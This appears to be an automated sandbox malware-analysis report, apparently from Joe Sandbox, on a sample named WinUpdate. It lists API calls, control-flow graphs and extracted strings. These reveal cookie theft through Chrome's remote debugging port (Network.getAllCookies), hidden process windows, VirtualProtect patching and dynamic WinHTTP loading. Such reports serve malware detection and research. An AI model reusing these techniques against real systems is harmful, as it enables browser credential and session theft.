                                                                                                                                                                                                                                                                                                • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$D$localhost${"id":1,"method":"Network.getAllCookies","params":{}}
                                                                                                                                                                                                                                                                                                • API String ID: 0-36197314
                                                                                                                                                                                                                                                                                                • Opcode ID: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                                                                                • Instruction ID: 40ccbdec88be9962e706eaa5533df9936f7b939966369cc920347d0ed5184c3d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8515C74D05258EEEB61CBA4CC85BDEBBB4EF14344F208199E40DA3295EB746A88CF51

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 964 100085d8-100085df 965 100085e1 964->965 966 100085e3-100085f8 getaddrinfo 964->966 965->966 967 10008642-10008647 966->967 968 100085fa-10008641 FormatMessageA call 1000dd3f call 100084c0 966->968 970 10008688-10008697 FreeAddrInfoW 967->970 971 10008649-1000864f 967->971 973 10008650-10008664 socket 971->973 975 10008666-10008676 connect 973->975 976 1000867e-10008683 973->976 978 10008685 975->978 979 10008678-1000867b closesocket 975->979 976->973 976->978 978->970 979->976
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • getaddrinfo.WS2_32(?,00000010,?,?), ref: 100085F0
                                                                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(000012FF,00000000,00000000,00000400,1002C4F0,00000400,00000000,?,00000010,?,?), ref: 10008613
                                                                                                                                                                                                                                                                                                • socket.WS2_32(?,?,?), ref: 10008659
                                                                                                                                                                                                                                                                                                • connect.WS2_32(00000000,?,?), ref: 1000866D
                                                                                                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 10008679
                                                                                                                                                                                                                                                                                                • FreeAddrInfoW.WS2_32(?), ref: 10008689
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddrFormatFreeInfoMessageclosesocketconnectgetaddrinfosocket
                                                                                                                                                                                                                                                                                                • String ID: getaddrinfo: %s
                                                                                                                                                                                                                                                                                                • API String ID: 1733616599-4118680637
                                                                                                                                                                                                                                                                                                • Opcode ID: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                                                                                • Instruction ID: ba985bc0003f028ac4b4e599035e3f0603eaa92aeb31a9206ee88384ba24f580
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E411E432A01614BBFB20DBA09C45F9E73A9FB44764F210619FB69A31D0C732BA168795

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 980 10007890-100078bd CreateToolhelp32Snapshot 981 100078e2-100078ea 980->981 982 100078bf-100078d9 Process32FirstW 980->982 983 100078f0-1000790b 982->983 984 100078db-100078dc CloseHandle 982->984 985 10007911-1000791a 983->985 986 1000790d-1000790f 983->986 984->981 988 10007920-10007929 985->988 987 1000792f-10007943 call 10003970 986->987 992 10007945-10007947 987->992 993 10007949 987->993 988->988 989 1000792b-1000792d 988->989 989->987 994 1000794b-10007963 992->994 993->994 995 10007965 994->995 996 10007976-1000797c 995->996 997 10007967 995->997 998 10007989-1000798f 996->998 999 1000797e-10007987 996->999 1000 10007969-1000796b 997->1000 998->1000 999->995 1001 10007995-1000799b 1000->1001 1002 1000796d-1000796f 1000->1002 1003 100079a7-100079a9 1001->1003 1004 1000799d-100079a2 call 10004160 1001->1004 1005 10007991-10007993 1002->1005 1006 10007971-10007974 1002->1006 1008 100079ab-100079bb 1003->1008 1009 10007a0d 1003->1009 1004->1003 1005->1001 1006->1001 1011 100079bd 1008->1011 1012 100079cf 1008->1012 1010 10007a10-10007a26 Process32NextW 1009->1010 1010->983 1013 10007a2c-10007a3b CloseHandle 1010->1013 1014 100079c0-100079c2 1011->1014 1015 100079d1-100079f5 FindWindowExA GetWindowThreadProcessId 1012->1015 1016 100079c4-100079c9 1014->1016 1017 100079cb-100079cd 1014->1017 1018 10007a00-10007a02 1015->1018 1019 100079f7-100079fa ShowWindow 1015->1019 1016->1014 1016->1017 1017->1009 1017->1012 1018->1015 1020 10007a04-10007a0b 1018->1020 1019->1018 1020->1010
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100078AF
                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 100078D1
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100078DC
                                                                                                                                                                                                                                                                                                • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 100079D8
                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 100079EC
                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 100079FA
                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 10007A1B
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 10007A2D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$CloseHandleProcess32$CreateFindFirstNextProcessShowSnapshotThreadToolhelp32
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3779799082-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e52270b00a648155402b89675e6d7e062810d99c949bb7e50b232112364f9da3
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a0021c97947e2911aefd651af9cf86dd4725709f7f3ac61b73b067665f658f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e52270b00a648155402b89675e6d7e062810d99c949bb7e50b232112364f9da3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6951A432E0022A9BEB21CFA4CC84BAEB7B5FF45794F214259DD19B7284D7345E42CB91

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 1037 1002179d-100217a4 GetModuleHandleA 1038 100217a6-100217b5 call 100217ba 1037->1038 1039 100217e4 1037->1039 1048 100217b7-100217c2 GetProcAddress 1038->1048 1049 1002181c 1038->1049 1041 100217e6-100217ea 1039->1041 1043 10021829 call 1002182e 1041->1043 1044 100217ec-100217f4 GetModuleHandleA 1041->1044 1047 100217f6-100217fe 1044->1047 1047->1047 1050 10021800-10021803 1047->1050 1048->1039 1052 100217c4-100217d1 VirtualProtect 1048->1052 1051 1002181d-10021825 1049->1051 1050->1041 1053 10021805-10021807 1050->1053 1060 10021827 1051->1060 1055 100217e3 1052->1055 1056 100217d3-100217e1 VirtualProtect 1052->1056 1057 10021809-1002180b 1053->1057 1058 1002180d-10021815 1053->1058 1055->1039 1056->1055 1061 10021816-10021817 GetProcAddress 1057->1061 1058->1061 1060->1050 1061->1049
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                  • Part of subcall function 100217BA: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                • Instruction ID: 12ea8003082ad6d35e98aca4d0b5426a3542ad57bdfd87ce099fb582a96701cb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC012D1EA4928239AB11D6B43CC2AFB5FD8DB772E0BE00796F501C7093DDA1890693F1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 10002BF2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                                                • String ID: /json$GET$WebClient/1.0$localhost
                                                                                                                                                                                                                                                                                                • API String ID: 856020675-4094957224
                                                                                                                                                                                                                                                                                                • Opcode ID: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
                                                                                                                                                                                                                                                                                                • Instruction ID: 91aef2c0181b5b02629918c2efa78feadcfe58d8f36eafdb9b4bf9d8472914fd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7399efbfcf4974d1b25d48a285a96dc5af21be4289c970b9d87b239830cf8846
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6761C470A00259ABFB11EFA4CC99FEEBBB8FF05380F20811AF505A7195DB746905CB61
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 10007744
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 1000784F
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 10007861
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1789362936-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 550c526438bf7204cbee193e80a4b25de3c59c2eb0d9c386291f43524615945c
                                                                                                                                                                                                                                                                                                • Instruction ID: d2bc65c811ca1ef7753ae95508b0a0770518ab985600e5889df07c8cfc886717
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 550c526438bf7204cbee193e80a4b25de3c59c2eb0d9c386291f43524615945c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3751B272D04219DBEB20CF98C888BAEB7F5FB48790F218259E81DA7384DB755D45CB90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1002179D: GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1002179D: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1002179D: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                • Instruction ID: 4dfc22582bc64b54c20ad08069fe92d14ded4e54327acf5c4b826402577880af
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E214B2E50C2C26FEB11CBB46C817E66FE8CB772A0F654696E440CB143DDA95846D3B2
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?), ref: 10007A5B
                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 10007A6C
                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,10001539,?,00000000,000000FF), ref: 10007AB8
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AC4
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,10001539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 10007AD2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3664964396-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
                                                                                                                                                                                                                                                                                                • Instruction ID: 1c9cee4698dd12d9c6f9fbc702e91760a2e2c8769d39cee738bd46e8f50a0180
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a0f2b50282c7bc3f47239c8ab4df11530f77ef440d7da5866bfc2edcfecd33b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A211C431B00310BBF7309F689C89F5A77ACFB867A0F200549F90A972D1D7B45A41C7A2
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(02E6C7DD), ref: 02E6C7E6
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,02E6C7DD), ref: 02E6C838
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 02E6C860
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6C803: GetProcAddress.KERNEL32(00000000,02E6C7F4), ref: 02E6C804
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,02E6C7F4,02E6C7DD), ref: 02E6C816
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc$ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2080333215-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                • Instruction ID: 35af159f1188c51fa65437065ebc61e9fc599755af712a07b43fc87587204456
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B201D2019C524138AA3166790C0DABA6F999A277E8B34F757E0D0C7193DAB4E506C3F6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2152742572-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                • Instruction ID: 73f11cf717d891ec8680d3d8ccba2c06736fe3b4cafecf77f1fc2b5b54d6cdbe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF0C24EA4924239EA21C5B43C82AFB4FDCCB771A0BA00A52F500C7183DC95890A93F1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 1000634E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
